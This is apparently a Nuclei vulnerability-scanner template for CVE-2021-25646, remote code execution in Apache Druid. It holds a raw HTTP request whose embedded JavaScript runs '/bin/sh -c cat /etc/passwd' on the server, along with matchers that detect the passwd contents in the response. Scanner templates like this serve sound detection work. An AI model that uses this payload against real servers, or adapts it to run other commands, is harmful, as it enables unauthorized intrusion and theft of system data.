id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu severity: critical reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce requests: - raw: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json Content-Length: 1006 Connection: close { "type":"index", "spec":{ "ioConfig":{ "type":"index", "firehose":{ "type":"local", "baseDir":"/etc", "filter":"passwd" } }, "dataSchema":{ "dataSource":"odgjxrrrePz", "parser":{ "parseSpec":{ "format":"javascript", "timestampSpec":{ }, "dimensionsSpec":{ }, "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", "":{ "enabled":"true" } } } } }, "samplerConfig":{ "numRows":10 } } matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/json" part: header - type: word words: - "numRowsRead" - "numRowsIndexed" part: body condition: and - type: regex regex: - "root:.*:0:0:" part: body